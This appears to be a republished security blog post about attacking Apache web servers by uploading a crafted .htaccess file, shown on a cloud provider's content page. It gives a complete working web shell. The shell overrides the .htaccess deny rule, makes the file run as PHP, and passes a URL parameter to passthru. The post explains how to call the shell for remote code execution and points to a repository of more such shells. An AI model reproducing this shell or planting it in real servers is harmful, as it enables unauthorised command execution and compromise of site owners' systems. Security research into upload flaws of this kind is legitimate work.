Attacking webservers via. HTACCESS

Source: Internet
Author: User

Attacking webservers via. HTACCESS
A while back I was testing a CMS that had a curious feature, all uploaded files were placed in their own directory. this was not a security enhancement as the application allowed php files to be uploaded. however I coudn't help ask, what if php uploads had been restricted? The answer was. htaccess files. using SetHandler in. htaccess file is well known, but does not lead to remote code execution. so after some thinking I put together some self contained. htaccess web shells. I wrote both a php and a server side include shells, but other options can easily be added (jsp, mod_perl, etc ).

This works by first diverting the default apache. htaccess access restriction from within. htaccess file so we can access it as a url. next we reconfigure. htaccess extension to be treated as a dynamic content script and finally we have our payload. the attack works because. htaccess parsing and processing for apache configuration directives occur before. htaccess file is processed As a web request. there is a relatively small gotcha, the payload has to be commented out with a # at the start so it doesn't get interpreted by apache and likewise, the script interpreter must ignore the apache directives. PHP lends itself well to this as any content not within the <? Php?> Tags are presented as is.


# Self contained .htaccess web shell - Part of the htshell project# Written by Wireghoul - http://www.justanotherhacker.com# Override default deny rule to make .htaccess file accessible over web<Files ~ "^\.ht">Order allow,denyAllow from all</Files># Make .htaccess file be interpreted as php file. This occur after apache has interpreted# the apache directoves from the .htaccess fileAddType application/x-httpd-php .htaccess###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
Simply upload the preferred shell as a. htaccess file and then visit the. htaccess file via the url http: // domain/path/. htaccess? C = command for remote code execution. The collection of attack files are collectively accessible from my github htshells repository.

Update: Due to the large number of comments on this post I have created more project information including a FAQ and tutorial under the project page.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.